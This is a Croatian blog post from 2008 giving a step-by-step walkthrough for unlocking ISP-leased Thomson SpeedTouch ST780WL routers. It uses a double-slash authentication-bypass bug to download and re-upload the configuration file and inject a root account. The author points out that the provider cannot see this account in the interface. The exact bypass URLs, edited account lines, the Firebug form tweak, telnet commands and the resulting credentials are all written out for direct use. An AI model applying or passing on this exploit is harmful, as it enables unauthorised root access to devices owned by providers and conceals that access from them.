četvrtak, 31.01.2008.
Otključavanje Speedtouch Thomson ST780WL routera
Koliko čujem Metronet, Iskon i Amis daju taj model u najam ali zaključanoga
Ovdje ću napisati kako je to konkretno na Amisu a i na ostala dva bi trebalo
biti isto.
Princip je možda primjenjiv i na drugim modelima Thomsonovih routera
Na ovom modelu postoji bug sa duplim slashom preko kojega se onda zaobilazi
username i password.
Na routeru postoje 9 kategorija usera (ispisano od onoga sa najvećim ovlastima pa do onoga sa najmanje ovlasti):
- root -> This is the root (master) account. This user has all privileges without any exceptions or limitations.
- SuperUser -> This user can perform any service via any access channel from any access origin.
- TechnicalSupport -> This user can perform any service via any access channel from WAN origin only.
- Administrator -> This user can perform any service via any access channel from LAN or Local origin only.
- LAN_Admin -> This user can perform only LAN related configurations via any access channel from any origin.
- Poweruser -> This user has access to the GUI (Service/overview page) via HTTP or HTTPS access channel from LAN origin only.
- WAN_Admin -> This user can perform only WAN related configurations via any access channel from any origin.
- User -> This user has access to the GUI (Overview pages, remote assistance) via HTTP or HTTPS access channel from LAN origin only.
- Guest -> This user does not have any privileges.
Kod Amisa su kreirana tri accounta, jedan TechnicalSupport, jedan Administrator i jedan Poweruser.
Poweruser je account koji se dodjeljuje korisnicima a mi ćemo ovdje kreirati još jedan i to root accont.
Tip accounta nije vidljiv iz sučelja ako je account većeg prioriteta od accounta kojeg imamo, tako da
provajder neće biti u mogućnosti vidjeti taj novo kreirani root account (iznimka je ako downloadaju
konfiguracijski fajl pa iz njega mogu vidjeti da je nešto dodano).
Otključavanje se vrši preko Firefoxa gdje će biti potrebno instalirati Firebug ekstenziju
https://addons.mozilla.org/en-US/firefox/addon/1843
Download
Slijedi downloadanje konfiguracijskog fajla pomoću slash buga sa adrese
http://192.168.1.254/cgi/b/backup/user.ini//
Fajl user.ini se neće downloadati pod tim imenom već će ime biti random generirano.
NAPOMENA: Obavezno napravite kopiju fajla za slučaj da nešto krivo napravite
Otvoriti taj .ini fajl sa nekim text editorom i nađite slijedeće:
add name=support password=_CYP_4a662f54693c27613345414f703e4465 role=TechnicalSupport hash2=4a6e256c652735313f27662a4a79277b
add name=amis password=_CYP_da617a9461779f4881c62831372ea452 role=Administrator hash2=6d377d5f7c553a275c3f462d7a6d7972
add name=user password=_CYP_756a422b2128612823507855502b6b5c role=PowerUser hash2=53526d374c3c615327716a34312d2528
Kod vas će biti drugačiji hashevi (ovi su izmišljeni) tako da vas to netreba zabrinjavati.
Sad selektiramo kompletnu treću liniju koda, to jest account sa našim
userom i passwordom te pejstamo odmah liniju ispod pa to izgleda ovako:
add name=support password=_CYP_4a662f54693c27613345414f703e4465 role=TechnicalSupport hash2=4a6e256c652735313f27662a4a79277b
add name=amis password=_CYP_da617a9461779f4881c62831372ea452 role=Administrator hash2=6d377d5f7c553a275c3f462d7a6d7972
add name=user password=_CYP_756a422b2128612823507855502b6b5c role=PowerUser hash2=53526d374c3c615327716a34312d2528
add name=user password=_CYP_756a422b2128612823507855502b6b5c role=PowerUser hash2=53526d374c3c615327716a34312d2528
Prvi hash je password za CLI pristup putem telneta dok je drugi za pristup
putem web sučelja.
Sad ćemo izmjeniti tip usera i staviti ime za naš novi root acount, za novi
username ćemo staviti "whr" pa će to na kraju izgledati ovako:
add name=support password=_CYP_4a662f54693c27613345414f703e4465 role=TechnicalSupport hash2=4a6e256c652735313f27662a4a79277b
add name=amis password=_CYP_da617a9461779f4881c62831372ea452 role=Administrator hash2=6d377d5f7c553a275c3f462d7a6d7972
add name=user password=_CYP_756a422b2128612823507855502b6b5c role=PowerUser hash2=53526d374c3c615327716a34312d2528
add name=whr password=_CYP_756a422b2128612823507855502b6b5c role=root hash2=53526d374c3c615327716a34312d2528
Sejvamo fajl i idemo dalje na drugi dio, uploadanje konfiguracijskog fajla.
Upload
Idemo na slijedeću adresu gdje ćemo koristiti slash bug a i firebug ekstenziju
http://192.168.1.254/cgi/b/bandr//
Kliknemo na Browse i odaberemo naš editirani konfiguracijski fajl.
Miš postavimo na button "Restore Configuration Now..." pritisnemo desnu tipku miša
i odaberemo "Inspect Element" i dobivamo slijedeće u donjem dijelu prozora:
Sad mišem kliknemo na crveno ispisano: /cgi/b/restore/
Dodamo još jedan slash pa onda to izgleda ovako: /cgi/b/restore//
Sad kliknete na "Restore Configuration Now...", potvrdite da ste sigurni da
želite uploadat fajl i pričekate dok upload ne završi.
Rekalkulacija
Idemo na Start->Run i upišemo cmd i pritisnemo enter
Sad upišemo: telnet 192.168.1.254 i pritisnemo enter
Za username unosimo root username ili u ovom našem slučaju whr
a za password onaj password koji imate za PowerUser account.
Kad smo se ulogirali koristimo slijedeću komandu: user config password
Tipkamo ovim redom:
1. unošenje komande: user config password whrteam
2. za name unosime: whr
3. za password unosimo: whrteam
4. ponavljamo password: whrteam
5. za [role] unosimo: root
6. za [descr] unosimo naprimjer: Hack Root Account
7. za [defuser] unosimo: n
8. za [defremadmin] unosimo: n
9. za [deflocadmin] unosimo: n
Objašnjenje pojmova:
n = no
y = yes
[descr] = description
[defuser] = default user
[defremadmin] = default remote admin
[deflocadmin] = default local admin
Rekalkulacija je završena i time smo završili sa otključavanjem.
Sad se možete logirati na root account putem web sučelja
Username: whr
Password: whrteam
